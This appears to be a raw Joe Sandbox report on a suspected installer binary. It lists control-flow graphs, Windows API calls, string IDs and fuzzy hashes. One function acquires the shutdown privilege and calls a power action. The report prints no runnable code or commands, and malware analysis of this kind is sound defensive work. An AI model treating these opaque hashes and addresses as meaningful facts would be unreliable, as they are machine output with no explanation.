                                        control_flow_graph 4648 6cd1aa7e-6cd1aa9a 4649 6cd1aaa0-6cd1aaa2 4648->4649 4650 6cd1ac59 4648->4650 4651 6cd1aac4-6cd1aae5 4649->4651 4652 6cd1aaa4-6cd1aab7 call 6cd0e7ff call 6cd0e7ec call 6cd0ef40 4649->4652 4653 6cd1ac5b-6cd1ac5f 4650->4653 4655 6cd1aae7-6cd1aaea 4651->4655 4656 6cd1aaec-6cd1aaf2 4651->4656 4670 6cd1aabc-6cd1aabf 4652->4670 4655->4656 4658 6cd1aaf4-6cd1aaf9 4655->4658 4656->4652 4656->4658 4660 6cd1aafb-6cd1ab07 call 6cd19a89 4658->4660 4661 6cd1ab0a-6cd1ab1b call 6cd1ac60 4658->4661 4660->4661 4668 6cd1ab1d-6cd1ab1f 4661->4668 4669 6cd1ab5c-6cd1ab6e 4661->4669 4671 6cd1ab21-6cd1ab29 4668->4671 4672 6cd1ab46-6cd1ab52 call 6cd1acd1 4668->4672 4673 6cd1ab70-6cd1ab79 4669->4673 4674 6cd1abb5-6cd1abd7 WriteFile 4669->4674 4670->4653 4675 6cd1abeb-6cd1abee 4671->4675 4676 6cd1ab2f-6cd1ab3c call 6cd1b07b 4671->4676 4684 6cd1ab57-6cd1ab5a 4672->4684 4680 6cd1aba5-6cd1abb3 call 6cd1b0e3 4673->4680 4681 6cd1ab7b-6cd1ab7e 4673->4681 4678 6cd1abe2 4674->4678 4679 6cd1abd9-6cd1abdf GetLastError 4674->4679 4686 6cd1abf1-6cd1abf6 4675->4686 4693 6cd1ab3f-6cd1ab41 4676->4693 4685 6cd1abe5-6cd1abea 4678->4685 4679->4678 4680->4684 4687 6cd1ab80-6cd1ab83 4681->4687 4688 6cd1ab95-6cd1aba3 call 6cd1b2a7 4681->4688 4684->4693 4685->4675 4694 6cd1ac54-6cd1ac57 4686->4694 4695 6cd1abf8-6cd1abfd 4686->4695 4687->4686 4689 6cd1ab85-6cd1ab93 call 6cd1b1be 4687->4689 4688->4684 4689->4684 4693->4685 4694->4653 4696 6cd1ac29-6cd1ac35 4695->4696 4697 6cd1abff-6cd1ac04 4695->4697 4703 6cd1ac37-6cd1ac3a 4696->4703 4704 6cd1ac3c-6cd1ac4f call 6cd0e7ec call 6cd0e7ff 4696->4704 4700 6cd1ac06-6cd1ac18 call 6cd0e7ec call 6cd0e7ff 4697->4700 4701 6cd1ac1d-6cd1ac24 call 6cd0e812 4697->4701 4700->4670 4701->4670 4703->4650 4703->4704 4704->4670
                                        APIs
                                          • Part of subcall function 6CD1ACD1: GetConsoleCP.KERNEL32(?,6CD19EF0,?), ref: 6CD1AD19
                                        • WriteFile.KERNEL32(?,?,6CD2350C,00000000,00000000,?,00000000,00000000,6CD248D6,00000000,00000000,?,00000000,6CD19EF0,6CD2350C,00000000), ref: 6CD1ABCF
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CD2350C,6CD19EF0,00000000,?,?,?,?,00000000,?), ref: 6CD1ABD9
                                        • __dosmaperr.LIBCMT ref: 6CD1AC1E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                        • String ID: 8Q
                                        • API String ID: 251514795-4022487301
                                        • Opcode ID: 5192bb46a6004f624fdf19b856d3fa8a509bc536d5aaad8fd384c359400007cb
                                        • Instruction ID: defc84d7a504c72357058a677e1357891aeb528379f66634fbcdbf367daa24cc
                                        • Opcode Fuzzy Hash: 5192bb46a6004f624fdf19b856d3fa8a509bc536d5aaad8fd384c359400007cb
                                        • Instruction Fuzzy Hash: 91510775B08109EFDB01DFA8D980BEEBBBAEF06318F140555E558A7E61D730994887B0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 4715 6cd049b0-6cd049bc 4716 6cd049fd 4715->4716 4717 6cd049be-6cd049c9 4715->4717 4718 6cd049ff-6cd04a77 4716->4718 4719 6cd049cb-6cd049dd 4717->4719 4720 6cd049df-6cd049ec call 6cbd01f0 call 6cd0f938 4717->4720 4721 6cd04aa3-6cd04aa9 4718->4721 4722 6cd04a79-6cd04aa1 4718->4722 4719->4720 4728 6cd049f1-6cd049fb 4720->4728 4722->4721 4724 6cd04aaa-6cd04b69 call 6cbd2250 call 6cbd2340 call 6cd08199 call 6cbce010 call 6cd05ea8 4722->4724 4728->4718
                                        APIs
                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CD04B51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Ios_base_dtorstd::ios_base::_
                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                        • API String ID: 323602529-1866435925
                                        • Opcode ID: 1e2a972718771418266516f415398f53111c1acefcb303e758254159179abeaf
                                        • Instruction ID: d75d42292306a0367c0c05b3fa42a0defe808b6c59b9cdf807f2a3437e8a45b4
                                        • Opcode Fuzzy Hash: 1e2a972718771418266516f415398f53111c1acefcb303e758254159179abeaf
                                        • Instruction Fuzzy Hash: E65125B5600B408FD725CF29C485B97BBF1BB58318F408A2DD9864BBA1D775B909CB90

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 4738 6ccdc310-6ccdc36c call 6cd05990 4741 6ccdc3c0-6ccdc3c9 4738->4741 4742 6ccdc3cb-6ccdc3d0 4741->4742 4743 6ccdc410-6ccdc415 4741->4743 4744 6ccdc3d6-6ccdc3db 4742->4744 4745 6ccdc460-6ccdc465 4742->4745 4746 6ccdc4f8-6ccdc4fd 4743->4746 4747 6ccdc41b-6ccdc420 4743->4747 4752 6ccdc51d-6ccdc531 WriteFile 4744->4752 4753 6ccdc3e1-6ccdc3e6 4744->4753 4748 6ccdc59c-6ccdc5b4 4745->4748 4749 6ccdc46b-6ccdc470 4745->4749 4750 6ccdc5e6-6ccdc5fd WriteFile 4746->4750 4751 6ccdc503-6ccdc508 4746->4751 4754 6ccdc567-6ccdc597 call 6cd0a1c0 4747->4754 4755 6ccdc426-6ccdc42b 4747->4755 4756 6ccdc5bc-6ccdc5d0 4748->4756 4749->4756 4757 6ccdc476-6ccdc47b 4749->4757 4759 6ccdc607-6ccdc60c 4750->4759 4758 6ccdc50e-6ccdc513 4751->4758 4751->4759 4761 6ccdc53b-6ccdc55f 4752->4761 4760 6ccdc3ec-6ccdc3f1 4753->4760 4753->4761 4754->4741 4763 6ccdc36e-6ccdc3b0 call 6cd0a740 ReadFile 4755->4763 4764 6ccdc431-6ccdc436 4755->4764 4766 6ccdc5d4-6ccdc5e1 4756->4766 4757->4741 4767 6ccdc481-6ccdc4ee WriteFile 4757->4767 4758->4752 4759->4741 4768 6ccdc612-6ccdc620 4759->4768 4760->4741 4769 6ccdc3f3-6ccdc406 4760->4769 4761->4754 4773 6ccdc3b3-6ccdc3b8 4763->4773 4764->4741 4771 6ccdc438-6ccdc452 4764->4771 4766->4741 4767->4746 4769->4773 4771->4766 4773->4741
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3070319616d89e20ef08552ecd97fa1213debab053e65dc2331ae8b12b728c74
                                        • Instruction ID: c9547c742962574628058f62b18ba450523b7b49114fd3b48a484c1d00b828cb
                                        • Opcode Fuzzy Hash: 3070319616d89e20ef08552ecd97fa1213debab053e65dc2331ae8b12b728c74
                                        • Instruction Fuzzy Hash: FD7168B0248305AFD700DF19C4807AEBBF4BF89718F51492EF699C6660E775E854CB92

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 4796 6cd1a745-6cd1a759 call 6cd203c2 4799 6cd1a75b-6cd1a75d 4796->4799 4800 6cd1a75f-6cd1a767 4796->4800 4803 6cd1a7ad-6cd1a7cd call 6cd2053f 4799->4803 4801 6cd1a772-6cd1a775 4800->4801 4802 6cd1a769-6cd1a770 4800->4802 4805 6cd1a793-6cd1a7a3 call 6cd203c2 CloseHandle 4801->4805 4806 6cd1a777-6cd1a77b 4801->4806 4802->4801 4804 6cd1a77d-6cd1a791 call 6cd203c2 * 2 4802->4804 4813 6cd1a7db 4803->4813 4814 6cd1a7cf-6cd1a7d9 call 6cd0e812 4803->4814 4804->4799 4804->4805 4805->4799 4818 6cd1a7a5-6cd1a7ab GetLastError 4805->4818 4806->4804 4806->4805 4816 6cd1a7dd-6cd1a7e0 4813->4816 4814->4816 4818->4803
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,6CD2307F), ref: 6CD1A79B
                                        • GetLastError.KERNEL32(?,00000000,?,6CD2307F), ref: 6CD1A7A5
                                        • __dosmaperr.LIBCMT ref: 6CD1A7D0
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CloseErrorHandleLast__dosmaperr
                                        • String ID:
                                        • API String ID: 2583163307-0
                                        • Opcode ID: f3f4456a5c55f1d340a58f99d076eaee56507ca33e023ace0b64594da3283081
                                        • Instruction ID: 09807131cc3ff60c0a002ef63d8fc33e150a511ad3d9c9ba2e935e51eebaf968
                                        • Opcode Fuzzy Hash: f3f4456a5c55f1d340a58f99d076eaee56507ca33e023ace0b64594da3283081
                                        • Instruction Fuzzy Hash: 2001483270E16057C3102738A884BAD37785BC3B3CF29025DE91CC7EE2DB64994DC2A0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 8Q
                                        • API String ID: 0-4022487301
                                        • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                        • Instruction ID: 399fd4b238d9149d333a4a0018da45e5e028ee936ae9f6c748db0de9def8f89f
                                        • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                        • Instruction Fuzzy Hash: 5EF0D132B466106AD6215F3DAC407CA33A98F8233CF350715E86597FF0CB34D40A86B9
                                        APIs
                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CD048D4
                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CD04914
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: Ios_base_dtorstd::ios_base::_
                                        • String ID:
                                        • API String ID: 323602529-0
                                        • Opcode ID: 637f0807786dfd0f3bd6c5aabe9e65a9477cea329382761b34d42c81ff9d8bb3
                                        • Instruction ID: f6a60ba66c996ba333853a49870980f1378e2edad54281eceadf777565f0ee44
                                        • Opcode Fuzzy Hash: 637f0807786dfd0f3bd6c5aabe9e65a9477cea329382761b34d42c81ff9d8bb3
                                        • Instruction Fuzzy Hash: 59513771201B40DBE725CF29C885BD6B7F4FB04718F448A1CE8AA47BA1DB30B549CB91
                                        APIs
                                        • GetLastError.KERNEL32(6CD34DD8,0000000C), ref: 6CD0DD72
                                        • ExitThread.KERNEL32 ref: 6CD0DD79
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ErrorExitLastThread
                                        • String ID:
                                        • API String ID: 1611280651-0
                                        • Opcode ID: 02299aca2233620eb25bdce4f50e6e7ad07329ca338389ef78a544aacaffa03d
                                        • Instruction ID: 1134fcbd944564bae52952b03762b837fb834390af6f8af81668721aed2c03f1
                                        • Opcode Fuzzy Hash: 02299aca2233620eb25bdce4f50e6e7ad07329ca338389ef78a544aacaffa03d
                                        • Instruction Fuzzy Hash: 02F0C2B0B04204AFEB05AFB4D808AAE3B74FF42318F24418AE11597B61DB359915CBB1
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: __wsopen_s
                                        • String ID:
                                        • API String ID: 3347428461-0
                                        • Opcode ID: e613c7f5ca1c1a5821f7db8a0cebd83abbcdd8c908a77a635c39f8e2475d4897
                                        • Instruction ID: 62e94e86559746bee04bc0621346ee6bfc7c5caaebed904aa335c7f3a2613106
                                        • Opcode Fuzzy Hash: e613c7f5ca1c1a5821f7db8a0cebd83abbcdd8c908a77a635c39f8e2475d4897
                                        • Instruction Fuzzy Hash: 63114C71A0820AAFCF05CF58E94499F7BF8EF48318F144099F809AB351D771EA11CBA4
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                        • Instruction ID: ddbe6597a1f57041cbdfbbee2a8b2060ffacf66fc793eeb671428548c8ec514f
                                        • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                        • Instruction Fuzzy Hash: 24018F72D11159AFCF019FA88C00AEE7FB5AF08218F104165FA24E2270E731CA24EB91
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,00000000,?,6CD22F35,?,?,00000000,?,6CD22F35,00000000,0000000C), ref: 6CD23294
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 1dc4df0e2ba61d073941a50798e277fbd93d561ceed29485c1fccfd167966bf2
                                        • Instruction ID: 5efc4ae7e00b3cb316350fdea82834434ef03dc951e382819c013ebb90e9396a
                                        • Opcode Fuzzy Hash: 1dc4df0e2ba61d073941a50798e277fbd93d561ceed29485c1fccfd167966bf2
                                        • Instruction Fuzzy Hash: 71D06C3210010DBBDF128E84EC06EDA3BAAFB48724F014000BA1856020C732E861AB91
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                        • Instruction ID: 3561ce658f392270edef963e555289e9d7fc34966949b6fca89ad09ea0ed5646
                                        • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                        • Instruction Fuzzy Hash:
                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 6CD04B8A
                                        • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6CD04B96
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6CD04BA4
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6CD04BCB
                                        • NtInitiatePowerAction.NTDLL ref: 6CD04BDF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                                        • String ID: SeShutdownPrivilege
                                        • API String ID: 3256374457-3733053543
                                        • Opcode ID: 01ab4b02c4598d7edf76974cb249929f34ce9a70b6679d5fe29485843a33110f
                                        • Instruction ID: 4b5d985714dffff5d76ce52fce52788c7c92e8f4bf5ff48f4338d6e30e2982d7
                                        • Opcode Fuzzy Hash: 01ab4b02c4598d7edf76974cb249929f34ce9a70b6679d5fe29485843a33110f
                                        • Instruction Fuzzy Hash: 18F054B0744300AFEA006B24DD0EB5A7BF8EF65705F00495CFA45A61D1E77269A8CBE6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: \j`7$\j`7$j
                                        • API String ID: 0-3644614255
                                        • Opcode ID: f0a58b631ea4c30c6d79a22ff67a5cf0128199e9ae34954cdacbe099336fa9bd
                                        • Instruction ID: e93c19c4678486d1ff5302764fb78371f965a2df9e73432625908d18db680053
                                        • Opcode Fuzzy Hash: f0a58b631ea4c30c6d79a22ff67a5cf0128199e9ae34954cdacbe099336fa9bd
                                        • Instruction Fuzzy Hash: 5842257460A3828FCB14CF68C49065ABBE1BBC9354F284A2EE4E9D7760D774D846CB53
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
                                        • API ID: _strlen
                                        • String ID:
                                        • API String ID: 4218353326-0
                                        • Opcode ID: e70c4893993b9ee201da32e9db9c0a8108314e45a563698f2a49cb4cd639d411
                                        • Instruction ID: d704788b47791c77e4f28104e4a6fcfd9491932ce241d1e2e708750685ac3d2b
                                        • Opcode Fuzzy Hash: e70c4893993b9ee201da32e9db9c0a8108314e45a563698f2a49cb4cd639d411
                                        • Instruction Fuzzy Hash: 2153CE71745B01CFC728CF2CC8D0A95B7E2EF95318B598A2DC0D68BA65EB74B54ACB40
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 6CD64CE5
                                          • Part of subcall function 6CD3AC2A: __EH_prolog.LIBCMT ref: 6CD3AC2F
                                          • Part of subcall function 6CD3C6A6: __EH_prolog.LIBCMT ref: 6CD3C6AB
                                          • Part of subcall function 6CD64A0E: __EH_prolog.LIBCMT ref: 6CD64A13
                                          • Part of subcall function 6CD64837: __EH_prolog.LIBCMT ref: 6CD6483C
                                          • Part of subcall function 6CD68143: __EH_prolog.LIBCMT ref: 6CD68148
